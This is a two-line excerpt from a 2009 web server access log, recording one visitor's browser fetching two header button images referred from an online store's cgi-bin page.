121.2.151.107 - - [13/Jul/2009:03:18:36 -0400] "GET /images/head_btn-conventions.gif HTTP/1.1" 200 1367 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
121.2.151.107 - - [13/Jul/2009:03:18:36 -0400] "GET /images/head_btn-contactUs.gif HTTP/1.1" 200 1235 "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+M37" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
